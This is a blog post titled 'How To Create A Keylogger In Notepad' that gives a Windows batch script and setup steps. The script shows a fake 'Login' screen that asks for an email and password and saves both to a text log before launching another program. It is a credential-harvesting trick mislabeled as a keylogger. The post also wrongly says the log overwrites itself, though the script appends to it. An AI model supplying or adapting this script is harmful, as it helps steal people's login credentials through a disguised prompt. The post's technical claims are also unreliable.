For Your Information & Entertainment News Updates

How To Create A Keylogger In Notepad

by Unknown , at 10:59 , has 0 comments



Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.



@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:\Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit
1.) Now paste the above code into Notepad and save it as a Logger.bat file.
2.) Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.
3.) Drag that folder in to the C:\
4.) Test out the Logger.bat!
5.) Alright, now once you test it, you will go back into the Logs folder in the C:\And a .txt file will be in there, [if you make a second entry, the .txt file will overwrite itself.]
Thanks For Visiting Naijaballers.com Please Don't Forget To Add Your Comment To Our Posts...

To Add A Comment ? Please Check The Comment Box Below...
Thank You For Visiting


CLICK HERE to join our BBM Channel for faster updates

How To Create A Keylogger In Notepad
About
How To Create A Keylogger In Notepad - written by Unknown , published at 10:59, categorized as Technology . And has 0 comments
0 comments Add a comment
Bck
Cancel Reply
Copyright ©2015 NaijaBallers Blog
Template Redesigned By Webtech - Published by NaijaBallers
Powered by Blogger
-->